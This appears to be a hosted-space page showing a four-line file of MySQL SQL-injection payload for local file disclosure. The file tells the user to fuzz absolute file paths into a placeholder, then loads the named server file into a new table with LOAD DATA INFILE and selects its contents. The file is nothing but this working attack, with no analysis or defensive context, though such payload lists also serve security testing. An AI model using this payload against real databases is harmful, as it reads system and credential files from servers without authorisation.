Spaces:
Runtime error
Runtime error
File size: 210 Bytes
5f491f6 | 1 2 3 4 | # mysql local file disclosure through sqli # fuzz interesting absolute filepath/filename into <filepath> create table myfile (input TEXT); load data infile '<filepath>' into table myfile; select * from myfile; |